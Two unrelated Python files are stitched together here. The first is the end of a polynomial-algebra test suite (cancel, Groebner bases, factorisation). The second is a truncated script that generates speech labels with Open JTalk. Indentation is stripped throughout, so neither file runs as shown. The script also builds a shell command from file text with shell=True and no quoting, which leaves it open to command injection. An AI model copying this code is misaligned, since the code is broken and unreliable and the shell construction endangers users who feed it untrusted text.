assert cancel((x**3/2 - Rational(1, 2))/(x**2 - 1)) == (x**2 + x + 1)/(2*x + 2)
assert cancel((exp(2*x) + 2*exp(x) + 1)/(exp(x) + 1)) == exp(x) + 1
f = (x**2 - a**2).as_poly(x)
g = (x - a).as_poly(x)
F = (x + a).as_poly(x)
G = Integer(1).as_poly(x)
assert cancel((f, g)) == (1, F, G)
f = x**3 + (sqrt(2) - 2)*x**2 - (2*sqrt(2) + 3)*x - 3*sqrt(2)
g = x**2 - 2
assert cancel((f, g), extension=True) == (1, x**2 - 2*x - 3, x - sqrt(2))
f = (-2*x + 3).as_poly()
g = (-x**9 + x**8 + x**6 - x**5 + 2*x**2 - 3*x + 1).as_poly()
assert cancel((f, g)) == (1, -f, -g)
Zx = ZZ.inject(x)
Zxf = Zx.field
f = y.as_poly(y, domain=Zxf)
g = Integer(1).as_poly(y, domain=Zx)
assert f.cancel(
g) == (1, y.as_poly(y, domain=Zxf), Integer(1).as_poly(y, domain=Zxf))
assert f.cancel(g, include=True) == (
y.as_poly(y, domain=Zxf), Integer(1).as_poly(y, domain=Zxf))
f = (5*x*y + x).as_poly(y, domain=Zxf)
g = (2*x**2*y).as_poly(y, domain=Zxf)
assert f.cancel(g, include=True) == (
(5*y + 1).as_poly(y, domain=Zxf), (2*x*y).as_poly(y, domain=Zxf))
f = -(-2*x - 4*y + 0.005*(z - y)**2)/((z - y)*(-z + y + 2))
assert cancel(f).is_Mul
P = tanh(x - 3.0)
Q = tanh(x + 3.0)
f = ((-2*P**2 + 2)*(-P**2 + 1)*Q**2/2 + (-2*P**2 + 2)*(-2*Q**2 + 2)*P*Q - (-2*P**2 + 2)*P**2*Q**2 + (-2*Q**2 + 2)*(-Q**2 + 1)*P**2/2 - (-2*Q**2 + 2)*P**2*Q**2)/(2*sqrt(P**2*Q**2 + 0.0001)) \
+ (-(-2*P**2 + 2)*P*Q**2/2 - (-2*Q**2 + 2)*P**2*Q/2)*((-2*P**2 + 2)*P*Q**2/2 + (-2*Q**2 + 2)*P**2*Q/2)/(2*(P**2*Q**2 + 0.0001)**Rational(3, 2))
assert cancel(f).is_Mul
# issue sympy/sympy#7022
A = Symbol('A', commutative=False)
p1 = Piecewise((A*(x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p2 = Piecewise((A*(x - 1), x > 1), (1/x, True))
assert cancel(p1) == p2
assert cancel(2*p1) == 2*p2
assert cancel(1 + p1) == 1 + p2
assert cancel((x**2 - 1)/(x + 1)*p1) == (x - 1)*p2
assert cancel((x**2 - 1)/(x + 1) + p1) == (x - 1) + p2
p3 = Piecewise(((x**2 - 1)/(x + 1), x > 1), ((x + 2)/(x**2 + 2*x), True))
p4 = Piecewise(((x - 1), x > 1), (1/x, True))
assert cancel(p3) == p4
assert cancel(2*p3) == 2*p4
assert cancel(1 + p3) == 1 + p4
assert cancel((x**2 - 1)/(x + 1)*p3) == (x - 1)*p4
assert cancel((x**2 - 1)/(x + 1) + p3) == (x - 1) + p4
# issue sympy/sympy#9363
M = MatrixSymbol('M', 5, 5)
assert cancel(M[0, 0] + 7) == M[0, 0] + 7
expr = (z*sin(M[1, 4] + M[2, 1] * 5 * M[4, 0]) - 5 * M[1, 2])/z
assert cancel(expr) == expr
assert cancel(((x - 1)**2/(x - 1), (x + 2*x**2)/x,
(x - x**3)/x)) == (x - 1, 2*x + 1, -x**2 + 1)
# issue sympy/sympy#12531
e = (x**4/24 - x*(x**3/24 + Rational(7, 8)) +
13*x/12)/((x**3/24 + Rational(7, 8))*(-x**4/6 - x/3) +
(x**3/6 - Rational(1, 2))*(x**4/24 + 13*x/12))
assert cancel(e) == Rational(-1, 4)
def test_reduced():
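    # reduced(f, G) divides f by the polynomials in G, returning the quotients Q
    # and a remainder r with f == sum(q*g for q, g in zip(Q, G)) + r.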
f = 2*x**4 + y**2 - x**2 + y**3
G = [x**3 - x, y**3 - y]
Q = [2*x, 1]
r = x**2 + y**2 + y
assert reduced(f, G) == (Q, r)
assert reduced(f, G, x, y) == (Q, r)
H = groebner(G)
assert H.reduce(f) == (Q, r)
Q = [(2*x).as_poly(x, y), Integer(1).as_poly(x, y)]
r = (x**2 + y**2 + y).as_poly()
assert reduced(f, G, polys=True) == (Q, r)
assert reduced(f, G, x, y, polys=True) == (Q, r)
H = groebner(G, polys=True)
assert H.reduce(f) == (Q, r)
f = 2*x**3 + y**3 + 3*y
G = groebner([x**2 + y**2 - 1, x*y - 2])
Q = [x**2 - x*y**3/2 + x*y/2 + y**6/4 - y**4/2 + y**2/4, -y**5/4 + y**3/2 + 3*y/4]
r = 0
assert reduced(f, G) == (Q, r)
assert G.reduce(f) == (Q, r)
assert reduced(f, G, auto=False)[1] != 0
assert G.reduce(f, auto=False)[1] != 0
assert G.contains(f) is True
assert G.contains(f + 1) is False
assert reduced(1, [1], x) == ([1], 0)
pytest.raises(ComputationFailed, lambda: reduced(1, [1]))
def test_groebner():
assert not groebner([], x, y, z)
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex') == [1 + x**2, -1 + y**4]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex') == [-1 + y**4, z**3, 1 + x**2]
assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex', polys=True) == \
[(1 + x**2).as_poly(x, y), (-1 + y**4).as_poly(x, y)]
assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex', polys=True) == \
[(-1 + y**4).as_poly(x, y, z, order='grevlex'), (z**3).as_poly(x, y, z, order='grevlex'),
(1 + x**2).as_poly(x, y, z, order='grevlex')]
assert groebner([x**3 - 1, x**2 - 1]) == [x - 1]
F = [3*x**2 + y*z - 5*x - 1, 2*x + 3*x*y + y**2, x - 3*y + x*z - 2*z**2]
f = z**9 - x**2*y**3 - 3*x*y**2*z + 11*y*z**2 + x**2*z**2 - 5
G = groebner(F, x, y, z, modulus=7)
assert G == [1 + x + y + 3*z + 2*z**2 + 2*z**3 + 6*z**4 + z**5,
1 + 3*y + y**2 + 6*z**2 + 3*z**3 + 3*z**4 + 3*z**5 + 4*z**6,
1 + 4*y + 4*z + y*z + 4*z**3 + z**4 + z**6,
6 + 6*z + z**2 + 4*z**3 + 3*z**4 + 6*z**5 + 3*z**6 + z**7]
Q, r = reduced(f, G, x, y, z, modulus=7, polys=True)
assert sum((q*g for q, g in zip(Q, G.polys)), r) == f.as_poly(modulus=7)
F = [x*y - 2*y, 2*y**2 - x**2]
assert groebner(F, x, y) == \
[x**2 - 2*y**2, x*y - 2*y, y**3 - 2*y]
assert groebner(F, x, y, order='grlex') == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner(F, y, x, order='grevlex') == \
[x**3 - 2*x**2, -x**2 + 2*y**2, x*y - 2*y]
assert groebner(F, order='grevlex', field=True) == \
[y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
assert groebner([1], x) == [1]
pytest.raises(ComputationFailed, lambda: groebner([1]))
assert groebner([x**2 - 1, x**3 + 1], method='buchberger') == [x + 1]
assert groebner([x**2 - 1, x**3 + 1], method='f5b') == [x + 1]
pytest.raises(ValueError, lambda: groebner([x, y], method='unknown'))
F = [x**2 - x - 1, (2*x - 1) * y - (x**10 - (1 - x)**10)]
assert groebner(F, x, y, method='buchberger') == [x**2 - x - 1, y - 55]
assert groebner(F, x, y, method='f5b') == [x**2 - x - 1, y - 55]
# issue sympy/sympy#11623
pytest.raises(ValueError,
lambda: groebner([0.144*x*y + 0.018*x**2 + 0.05*x - 1.577,
0.072*y**2 + 0.036*x*y + 0.05*y - 1.423],
x, y))
def test_set_order():
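    # set_order() converts an already-computed Groebner basis from one monomial
    # ordering (e.g. grlex) to another (e.g. lex) without recomputing it.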
F = [a + b + c + d, a*b + a*d + b*c + b*d, a*b*c + a*b*d + a*c*d + b*c*d, a*b*c*d - 1]
G = groebner(F, a, b, c, d, order=grlex)
B = [4*a + 3*d**9 - 4*d**5 - 3*d,
4*b + 4*c - 3*d**9 + 4*d**5 + 7*d,
4*c**2 + 3*d**10 - 4*d**6 - 3*d**2,
4*c*d**4 + 4*c - d**9 + 4*d**5 + 5*d,
d**12 - d**8 - d**4 + 1]
assert groebner(F, a, b, c, d, order=lex) == B
assert G.set_order(lex) == B
assert G.set_order(grlex) == G
F = [9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9,
-72*t*x**7 - 252*t*x**6 + 192*t*x**5 + 1260*t*x**4 + 312*t*x**3 - 404*t*x**2 - 576*t*x +
108*t - 72*x**7 - 256*x**6 + 192*x**5 + 1280*x**4 + 312*x**3 - 576*x + 96]
G = groebner(F, t, x, order=grlex)
B = [203577793572507451707*t + 627982239411707112*x**7 - 666924143779443762*x**6 -
10874593056632447619*x**5 + 5119998792707079562*x**4 + 72917161949456066376*x**3 +
20362663855832380362*x**2 - 142079311455258371571*x + 183756699868981873194,
9*x**8 + 36*x**7 - 32*x**6 - 252*x**5 - 78*x**4 + 468*x**3 + 288*x**2 - 108*x + 9]
assert groebner(F, t, x, order=lex) == B
assert G.set_order(lex) == B
F = [x**2 - x - 3*y + 1, -2*x + y**2 + y - 1]
G = groebner(F, x, y, order=lex)
B = [x**2 - x - 3*y + 1, y**2 - 2*x + y - 1]
assert groebner(F, x, y, order=grlex) == B
assert G.set_order(grlex) == B
assert G.set_order(grlex).set_order(lex) == G
assert G == [2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7]
F = [x**2 - 2*y + 1, x + y/2]
G = groebner(F, x, y, order=grlex)
B = [y**2 - 8*y + 4, x + y/2]
assert G == B
assert G.set_order(lex) == reversed(B)
G = groebner([x**3 - y**3], x, y, order='grlex')
pytest.raises(NotImplementedError, lambda: G.set_order('lex'))
def test_dimension_and_independent_sets():
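    # The dimension of the ideal equals the size of its largest independent
    # set of variables, as the paired assertions below illustrate.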
assert groebner((x, y)).dimension == 0
assert groebner((x**3 + y**2,)).dimension == 1
assert groebner((x, y, z)).dimension == 0
assert groebner((x, y, z), x, y, z, t).dimension == 1
assert groebner((x*y - z, y*z - x, x*y - y)).dimension == 0
assert groebner((x**2 - 2*x*z + 5, x*y**2 + y*z**3, 3*y**2 - 8*z**2)).dimension == 0
assert groebner((x + y, x - y)).independent_sets == [[]]
assert groebner((x + y, 2*x + 2*y)).independent_sets == [[y]]
assert groebner((x**2 + y**2,)).independent_sets == [[y]]
assert groebner((x**3*y**2 - 1,)).independent_sets == [[y], [x]]
assert groebner((x**3 - y**3,)).independent_sets == [[y]]
assert groebner((y - x, y - x - 1)).independent_sets is None
assert groebner((x*y - z**2 - z, x**2 + x - y*z, x*z - y**2 - y)).independent_sets == [[z]]
assert groebner((x*y*z,)).independent_sets == [[y, z], [x, z], [x, y]]
assert groebner((x**2 - 1, (x - 1)*y, (x + 1)*z)).independent_sets == [[z], [y]]
assert groebner((x**2 + y**2 + z**2, x + y - z, y + z**2)).independent_sets == [[]]
assert groebner((x*z - 2*y + 1, y*z - 1 + z, y*z + x*y*z + z)).independent_sets == [[]]
assert groebner((x**3*y*z - x*z**2, x*y**2*z - x*y*z, x**2*y**2 - z)).independent_sets == [[z], [y], [x]]
assert groebner((x*y**2 - z - z**2, x**2*y - y, y**2 - z**2)).independent_sets == [[x]]
assert groebner((x*y + z - 1, x - y - z**2, x**2 - 2*y**2 + 1)).independent_sets == [[]]
assert groebner((z*x - y - x + x*y, y*z - z + x**2 + y*x**2, x - x**2 + y, z)).independent_sets == [[]]
assert groebner((x*y - x*z + y**2, y*z - x**2 + x**2*y, x - x*y + y)).independent_sets == [[z]]
assert groebner((y*z + x**2 + z, x*y*z + x*z - y**3, x*z + y**2)).independent_sets == [[]]
assert groebner((x**2 + z**2*y + y*z, y**2 - z*x + x, x*y + z**2 - 1)).independent_sets == [[]]
assert groebner((x + y**2*z - 2*y**2 + 4*y - 2*z - 1, -x + y**2*z - 1)).independent_sets == [[z], [y]]
assert groebner((x, y - 1, z)).independent_sets == [[]]
# H. Kredel and V. Weispfennig. Computing dimension and independent sets for
# polynomial ideals. J. Symbolic Computation, 6(1):231–247, November 1988.
# Ex. 4.1.
V = A31, A32, A21, B1, B2, B3, C3, C2 = symbols('A31 A32 A21 B1 B2 B3 C3 C2')
S = (C2 - A21, C3 - A31 - A32, B1 + B2 + B3 - 1,
B2*C2 + B3*C3 - QQ(1, 2), B2*C2**2 + B3*C3**2 - QQ(1, 3),
B3*A32*C2 - QQ(1, 6))
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[C3, C2], [B3, C2], [B2, C3], [B2, B3], [A32, C3], [A32, B2]]
assert G.dimension == 2
# Ex. 4.3
V = B1, A32, B2, B3, A, C3, C2, B = symbols('B1 A32 B2 B3 A C3 C2 B')
S = (B1 + B2 + B3 - A - B,
B2*C2 + B3*C3 - QQ(1, 2) - B/2 - B**2 + A*B,
B2*C2**2 + B3*C3**2 - A/3 - A*B**2 + 4*B/3 + B**2 + B**3,
B3*A32*C2 - A/6 - A*B/2 - A*B**2 + 2*B/3 + B**2 + B**3,
B2*C2**3 + B3*C3**3 - QQ(1, 4) - B/4 - 5*B**2/2 - 3*B**3/2 - B**4 + A*B + A*B**3,
B3*C3*A32*C2 - QQ(1, 8) - 3*B/8 - 7*B**2/4 - 3*B**3/2 - B**4 + A*B/2 + A*B**2/2 + A*B**3,
B3*A32*C2**2 - QQ(1, 12) - B/12 - 7*B**2/6 - 3*B**3/2 - B**4 + 2*A*B/3 + A*B**2 + A*B**3,
QQ(1, 24) + 7*B/24 + 13*B**2/12 + 3*B**3/2 + B**4 - A*B/3 - A*B**2 - A*B**3)
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[B3, C2], [A32, C3, C2], [A32, B2, C3], [A32, B2, B3]]
assert G.dimension == 3
# Ex. 4.4
V = L7, L6, L4, L1, L5, L3, L2 = symbols('L7 L6 L4 L1 L5 L3 L2')
S = (L1*(L4 - L5/2 + L6),
(2*L1**2/7 - L4)*(-10*L1 + 5*L2 - L3),
(2*L1**2/7 - L4)*(3*L4 - L5 + L6),
(-2*L1**2 + L1*L2 + 2*L1*L3 - L2**2 - 7*L5 + 21*L6)*(-3*L1 + 2*L2) + 21*(7*L7 - 2*L1*L4 + 3*L1**3/7),
(-2*L1**2 + L1*L2 + 2*L1*L3 - L2**2 - 7*L5 + 21*L6)*(2*L4 - 2*L5) + (7*L7 - 2*L1*L4 + 3*L1**3/7)*(-45*L1 + 15*L2 - 3*L3),
2*(-2*L1**2 + L1*L2 + 2*L1*L3 - L2**2 - 7*L5 + 21*L6)*L7 + (7*L7 - 2*L1*L4 + 3*L1**3/7)*(12*L4 - 3*L5 + 2*L6),
(L1*(5*L1 - 3*L2 + L3))*(2*L2 - L1) + 7*(L1*(2*L6 - 4*L4)),
(L1*(5*L1 - 3*L2 + L3))*L3+7*(L1*(2*L6 - 4*L4)),
(L1*(5*L1 - 3*L2 + L3))*(-2*L4 - 2*L5) + (L1*(2*L6 - 4*L4))*(2*L2 - 8*L1) + 42*L1*L7,
(L1*(5*L1 - 3*L2 + L3))*(8*L5/3 + 6*L6) + (L1*(2*L6 - 4*L4))*(11*L1 - 17*L2/3 + 5*L3/3) - 84*L1*L7,
15*L7*(L1*(5*L1 - 3*L2 + L3)) + (L1*(2*L6 - 4*L4))*(5*L4 - 2*L5) + L1*L7*(-120*L1 + 30*L2 - 6*L3)/2,
-3*(L1*(5*L1 - 3*L2 + L3))*L7 + (L1*(2*L6 - 4*L4))*(-L4/2 + L5/4 - L6/2) + L1*L7/2*(24*L1 - 6*L2),
3*(L1*(2*L6 - 4*L4))*L7 + L1*L7*(40*L4 - 8*L5 + 4*L6)/2)
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[L5, L3, L2], [L6, L3]]
assert G.dimension == 3
# Algebraic Solution of Nonlinear Equation Systems in REDUCE, p.7.
V = ax, bx, cx, gx, jx, lx, mx, nx, q = symbols('ax bx cx gx jx lx mx nx q')
S = (ax*q - lx*q - mx, ax - gx*q - lx, bx*q**2 + cx*q - jx*q - nx,
q*(-ax*q + lx*q + mx), q*(-ax + gx*q + lx))
G = groebner(S, *V, domain=QQ)
assert G.independent_sets == [[cx, jx, lx, mx, nx, q], [cx, gx, jx, lx, mx, nx], [bx, cx, gx, jx, lx, nx]]
assert G.dimension == 6
def test_GroebnerBasis():
F = [x*y - 2*y, 2*y**2 - x**2]
G = groebner(F, x, y, order='grevlex')
assert groebner(F + [0], x, y, order='grevlex') == G
assert G.args == ((y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y), x, y)
H = [y**3 - 2*y, x**2 - 2*y**2, x*y - 2*y]
P = [h.as_poly(x, y, order='grevlex') for h in H]
assert isinstance(G, GroebnerBasis) is True
assert len(G) == 3
assert G[0] == H[0] and not G[0].is_Poly
assert G[1] == H[1] and not G[1].is_Poly
assert G[2] == H[2] and not G[2].is_Poly
assert G[1:] == H[1:] and not any(g.is_Poly for g in G[1:])
assert G[:2] == H[:2] and not any(g.is_Poly for g in G[1:])
assert G.exprs == H
assert G.polys == P
assert G.gens == (x, y)
assert G.domain == ZZ
assert G.order == grevlex
assert G == H
assert G == tuple(H)
assert G == P
assert G == tuple(P)
assert G
G = groebner(F, x, y, order='grevlex', polys=True)
assert G[0] == P[0] and G[0].is_Poly
assert G[1] == P[1] and G[1].is_Poly
assert G[2] == P[2] and G[2].is_Poly
assert G[1:] == P[1:] and all(g.is_Poly for g in G[1:])
assert G[:2] == P[:2] and all(g.is_Poly for g in G[1:])
assert tuple(G) == ((y**3 - 2*y).as_poly(x, y, order='grevlex'),
(x**2 - 2*y**2).as_poly(x, y, order='grevlex'),
(x*y - 2*y).as_poly(x, y, order='grevlex'))
G = groebner(F, x, y, order='grevlex', polys=True)
assert hash(G) == hash(groebner([_.as_poly() for _ in F], order='grevlex'))
assert (G == 1) is False
def test_Poly_from_expr_recursive():
assert (x*(x**2 + x - 1)**2).as_poly() == (x**5 + 2*x**4 - x**3 -
2*x**2 + x).as_poly()
assert (x + y).as_poly(wrt=y) == (x + y).as_poly(y, x)
assert (x + sin(x)).as_poly(wrt=sin(x)) == (x + sin(x)).as_poly(sin(x), x)
assert (2*(y + z)**2 - 1).as_poly() == (2*y**2 + 4*y*z +
2*z**2 - 1).as_poly()
assert (x*(y + z)**2 - 1).as_poly() == (x*y**2 + 2*x*y*z +
x*z**2 - 1).as_poly()
assert (2*x*(y + z)**2 - 1).as_poly() == (2*x*y**2 + 4*x*y*z +
2*x*z**2 - 1).as_poly()
assert (2*(y + z)**2 - x - 1).as_poly() == (2*y**2 + 4*y*z + 2*z**2 -
x - 1).as_poly()
assert (x*(y + z)**2 - x - 1).as_poly() == (x*y**2 + 2*x*y*z +
x*z**2 - x - 1).as_poly()
assert (2*x*(y + z)**2 - x - 1).as_poly() == (2*x*y**2 + 4*x*y*z + 2 *
x*z**2 - x - 1).as_poly()
assert (x*y + (x + y)**2 + (x + z)**2).as_poly() == (2*x*z + 3*x*y + y**2 +
z**2 + 2*x**2).as_poly()
assert (x*y*(x + y)*(x + z)**2).as_poly() == (x**3*y**2 + x*y**2*z**2 +
y*x**2*z**2 + 2*z*x**2*y**2 +
2*y*z*x**3 + y*x**4).as_poly()
assert ((x + y)**2).as_poly(x) == (x**2 + 2*x*y + y**2).as_poly(x)
assert ((x + y)**2).as_poly(x, expand=True) == (x**2 + 2*x*y +
y**2).as_poly(x)
assert ((x + y)**2).as_poly(y) == (x**2 + 2*x*y + y**2).as_poly(y)
assert ((x + y)**2 - y**2 - 2*x*y).as_poly() == (x**2).as_poly(x, y)
e = x**2 + (1 + sqrt(2))*x + 1
assert (e.as_poly(x, greedy=False) ==
e.as_poly(x, domain=QQ.algebraic_field(sqrt(2))))
# issue sympy/sympy#12400
assert ((1/(1 + sqrt(2))).as_poly(x) ==
(1/(1 + sqrt(2))).as_poly(x, domain=QQ.algebraic_field(1/(1 + sqrt(2)))))
# issue sympy/sympy#19755
assert ((x + (2*x + 3)**2/5 + Rational(6, 5)).as_poly() ==
(4*x**2/5 + 17*x/5 + 3).as_poly(domain=QQ))
assert (((x + 1)**2)/2).as_poly() == (x**2/2 + x +
Rational(1, 2)).as_poly(domain=QQ)
def test_keep_coeff():
u = Mul(2, x + 1, evaluate=False)
assert _keep_coeff(Integer(1), x) == x
assert _keep_coeff(Integer(-1), x) == -x
assert _keep_coeff(Float(1.0), x) == 1.0*x
assert _keep_coeff(Float(-1.0), x) == -1.0*x
assert _keep_coeff(Integer(1), 2*x) == 2*x
assert _keep_coeff(Integer(2), x/2) == x
assert _keep_coeff(Integer(2), sin(x)) == 2*sin(x)
assert _keep_coeff(Integer(2), x + 1) == u
assert _keep_coeff(x, 1/x) == 1
assert _keep_coeff(x + 1, Integer(2)) == u
def test_poly_matching_consistency():
# Test for sympy/sympy#5514
assert I * x.as_poly() == (I*x).as_poly(x)
assert x.as_poly() * I == (I*x).as_poly(x)
def test_sympyissue_5786():
f, g = z - I*t, x - I*y
assert factor(expand(f*g), extension=[I]) == f*g
assert factor(expand(f**2*g), extension=[I]) == f**2*g
assert factor(expand(f*g**3), extension=[I]) == f*g**3
# issue sympy/sympy#18895
e = (x - 1)*(y - 1)
assert factor(expand(e)) == e
assert factor(expand(e), extension=[I]) == e
def test_noncommutative():
class Foo(Expr):
is_commutative = False
e = x/(x + x*y)
c = 1/(1 + y)
fe, fc = map(Foo, [e, c])
assert cancel(fe) == fc
assert cancel(e + fe) == c + fc
assert cancel(e*fc) == c*fc
def test_to_rational_coeffs():
assert to_rational_coeffs(
(x**3 + y*x**2 + sqrt(y)).as_poly(x, domain=EX)) is None
assert to_rational_coeffs((((x**2 - 1)*(x - 2)*y).subs({x: x*(1 + sqrt(2))})).as_poly(x, y, domain=EX)) is None
assert to_rational_coeffs((x**5 + sqrt(2)*x**2 + 1).as_poly(x, domain=EX)) is None
def test_sympyissue_8754():
z = 0.0001*(x*(x + (4.0*y))) + 0.0001*(y*(x + (4.0*y)))
w = expand(z)
v = factor(w)
assert v == Mul(Float('10000.0', 15),
Float('0.0001', 15)*x + Float('0.0001', 15)*y,
Float('0.0001', 15)*x + Float('0.00040000000000000002', 15)*y,
evaluate=False)
assert expand(v) == w
def test_factor_terms():
# issue sympy/sympy#7067
assert factor_list(x*(x + y)) == (1, [(x, 1), (x + y, 1)])
assert sqf_list(x*(x + y)) == (1, [(x**2 + x*y, 1)])
def test_sympyissue_8210():
p = Integer(0).as_poly(x)
p2 = p.copy()
assert id(p) != id(p2)
assert p == p2
def test_sympyissue_11775():
e = y**4 + x*y**3 + y**2 + x*y
assert factor_list(e, y) == (1, [(y, 1), (y**2 + 1, 1), (x + y, 1)])
def test_sympyissue_5602():
(Integral(x, (x, 0, 1))*x + x**2).as_poly(x)
def test_sympyissue_15798():
o1 = (x + y).as_poly(x, y, z)
o2 = o1.copy()
assert o1 == o2
p = (x + sqrt(2)).as_poly(x)
assert p == p.copy()
@pytest.mark.timeout(20)
def test_sympyissue_19670():
(E**100000000).as_poly()
def test_sympyissue_8810():
e = y**3 + y**2*sqrt(x) + y + x
p = e.as_poly(y)
c = e.as_poly(y, composite=True)
assert c == e.as_poly(y, domain=ZZ.inject(x, sqrt(x)))
assert p.as_poly(y, composite=True) == c
def test_sympyissue_8695():
e = (x**2 + 1) * (x - 1)**2 * (x - 2)**3 * (x - 3)**3
r = (1, [(x**2 + 1, 1), (x - 1, 2), (x**2 - 5*x + 6, 3)])
assert sqf_list(e) == r
assert e.as_poly().sqf_list() == r
# regression test from the issue thread, not related to the issue
e = (x + 2)**2 * (y + 4)**5
assert sqf(e) == sqf(e.expand()) == e
def test_sympyissue_19070():
e = (5*x).as_poly(modulus=19)
r = e*2
assert r == (10*x).as_poly(modulus=19)
assert r.get_modulus() == 19
def test_sympyissue_19161():
assert sympify('x**2').as_poly().simplify() == (x**2).as_poly()
def test_sympyissue_20484():
assert (x*y*z).as_poly().eval(x, y*z) == (y**2*z**2).as_poly()
def test_sympyissue_20640():
p = (x**2 + y).as_poly(field=True)
p0 = y.as_poly(x, y, field=True)
assert div(p, p0) == (Integer(1).as_poly(x, y, field=True),
(x**2).as_poly(x, y, field=True))
assert div(p.as_expr(), p0.as_expr(), field=True) == (1, x**2)
def test_sympyissue_20973():
e = exp(1 + O(x))
assert cancel(e) == e
def test_sympyissue_20985():
assert degree(1.0 + I*x/y, domain=CC.frac_field(y)) == 1
def test_sympyissue_21180():
f = (x**4 + 6*x**3 + 4*x**2 - 30*x - 45).as_poly()
assert factor(f) == (x + 3)**2*(x**2 - 5)
def test_sympyissue_20444():
e = 33*log(x) + log(8) + 58
assert LT(e) == 3*log(2)
def test_sympyissue_13029():
assert sqf_part(a*(x - 1)**2*(y - 3)**3, x, y) == x*y - 3*x - y + 3
@pytest.mark.timeout(5)
def test_sympyissue_21760():
_, r = (x**2016 - x**2015 + x**1008 + x**1003 +
1).as_poly().div((x - 1).as_poly())
assert r == Integer(3).as_poly(x)
def test_sympyissue_21761():
t = tan(pi/7)
assert factor(-exp(x)*t + 1,
extension=True) == Mul(-1, exp(x) - 5*t - t**5/7 + 3*t**3,
t, evaluate=False)
def test_sympyissue_22093():
expr = ((2*y**3*sin(x/y)**2 + x)**2*(y*(-6*y**2*sin(x/y)**2 +
4*y*x*sin(x/y)*cos(x/y)) /
(2*y**3*sin(x/y)**2 + x)**2 +
1/(2*y**3*sin(x/y)**2 + x)) /
(4*y*(2*y**2*(3*y*sin(x/y) - 2*x*cos(x/y))**2*sin(x/y)**2 /
(2*y**3*sin(x/y)**2 + x) - 3*y*sin(x/y)**2 +
4*x*sin(x/y)*cos(x/y) - (3*y*sin(x/y) - 2*x*cos(x/y))*sin(x/y) +
x**2*sin(x/y)**2/y - x**2*cos(x/y)**2/y)))
res = -(4*x**2*y**2*sin(x/y)*cos(x/y) + x**2 +
8*x*y**5*sin(x/y)**3*cos(x/y) - 2*x*y**3*sin(x/y)**2 -
8*y**6*sin(x/y)**4)/(-4*x**3*sin(x/y)**2 + 4*x**3*cos(x/y)**2 -
8*x**2*y**3*sin(x/y)**4 -
24*x**2*y**3*sin(x/y)**2*cos(x/y)**2 -
24*x**2*y*sin(x/y)*cos(x/y) +
48*x*y**4*sin(x/y)**3*cos(x/y) +
24*x*y**2*sin(x/y)**2 - 24*y**5*sin(x/y)**4)
assert cancel(expr).equals(res)
def test_sympyissue_22673():
e = x**7 - x
p = e.as_poly(modulus=7)
f = x*(x + 1)*(x + 2)*(x + 3)*(x + 4)*(x + 5)*(x + 6)
assert factor(e, modulus=7) == factor(p) == f
assert factor_list(e, modulus=7) == (1, [(x + i, 1) for i in range(7)])
assert factor_list(p) == (1, [((x + i).as_poly(modulus=7), 1)
for i in range(7)])
|
py | b40b2752ff868a76c19797235b2157b4ac9fb364 |
# import
import os
import sys
import glob
import argparse
import subprocess
from pprint import pprint
def main():
    # Set up and parse the command-line arguments
parser = argparse.ArgumentParser(formatter_class = argparse.RawTextHelpFormatter)
parser.add_argument('InputFolderPath', help = 'Specify a folder with text')
parser.add_argument('OpenJTalkOption', help = 'Specify the argument to pass to Open JTalk used when creating the label')
args = parser.parse_args()
    # Folder containing this script
current_folder = os.path.dirname(__file__) + '/'
print(current_folder)
    # Input folder
input_folder = args.InputFolderPath.strip().rstrip('/') + '/'
    # Output folder
output_folder = current_folder + 'tools/segment_adapt/voices/'
# Open JTalk
open_jtalk = current_folder + 'tools/open_jtalk/bin/open_jtalk'
open_jtalk_dic = current_folder + 'tools/open_jtalk/dic/'
open_jtalk_option = args.OpenJTalkOption.strip()
open_jtalk_log = current_folder + 'tmp.log'
    # Create the output folders
os.makedirs(output_folder, exist_ok = True)
os.makedirs(output_folder + 'labels/full/', exist_ok = True)
os.makedirs(output_folder + 'labels/mono/', exist_ok = True)
print('Input folder: ' + input_folder)
print('Output folder: ' + output_folder)
print()
    # List of text files
textfile_list = sorted(glob.glob(input_folder + '*.txt'))
    # Process each text file
index = 0
for textfile in textfile_list:
        # Increment the index
index += 1
        # File name without its extension
textfile_id = os.path.splitext(os.path.basename(textfile))[0]
        # Open the file
with open(textfile, encoding = 'utf-8') as fp:
            # Read the file
text = fp.read()
            # Remove newlines
text = text.replace('\n', ' ')
text = text.replace('{player}', '')
print('Text: ' + text)
            # Run Open JTalk
open_jtalk_command = 'echo "' + text + '" | ' + open_jtalk + ' -x ' + open_jtalk_dic + ' ' + open_jtalk_option + ' -ot ' + open_jtalk_log + ' 2> /dev/null'
subprocess.run(open_jtalk_command, shell = True)
            # Open the log it produced
with open(open_jtalk_log, encoding = 'utf-8') as log:
                # Read the log
lines = log.readlines()
                # If the log is not empty
if ''.join(lines) != "":
                    # Output paths of the voice file
voice_old = output_folder + textfile_id + '.raw'
voice_new = output_folder + 'voices_' + str(index).zfill(4) + '.raw'
print('Voice: ' + voice_old)
print('Voice rename: ' + voice_new)
                    # Rename the voice file to a sequentially numbered name
os.rename(voice_old, voice_new)
                    # Output path of the full-context (full) label
label_full = output_folder + 'labels/full/voices_' + str(index).zfill(4) + '.lab'
print('Label (full): ' + label_full)
                    # Output path of the monophone (mono) label
label_mono = output_folder + 'labels/mono/voices_' + str(index).zfill(4) + '.lab'
print('Label (mono): ' + label_mono)
                    # Write the full-context label
for line in lines:
if line.find('0000') >= 0 and line.find('xx/') >= 0:
with open(label_full, mode = 'a', encoding = 'utf-8') as full_rfp:
full_rfp.write(line)
                    # Write the monophone label
                    # Reopen the full-context label written above
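                    # (A full-context HTS label line typically looks like
                    #  "start end p1^p2-p3+p4=p5/A:..."; the mono label keeps
                    #  the timing fields and only the central phoneme p3,
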